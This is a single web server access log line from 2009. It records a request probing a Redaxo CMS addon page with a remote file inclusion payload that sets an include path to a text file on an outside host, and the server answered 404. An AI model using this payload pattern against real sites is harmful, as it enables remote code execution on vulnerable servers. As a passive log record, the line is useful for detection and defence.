216.199.232.112 - - [12/Nov/2009:00:12:37 -0600] "GET /logs/access_log.1243209600//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
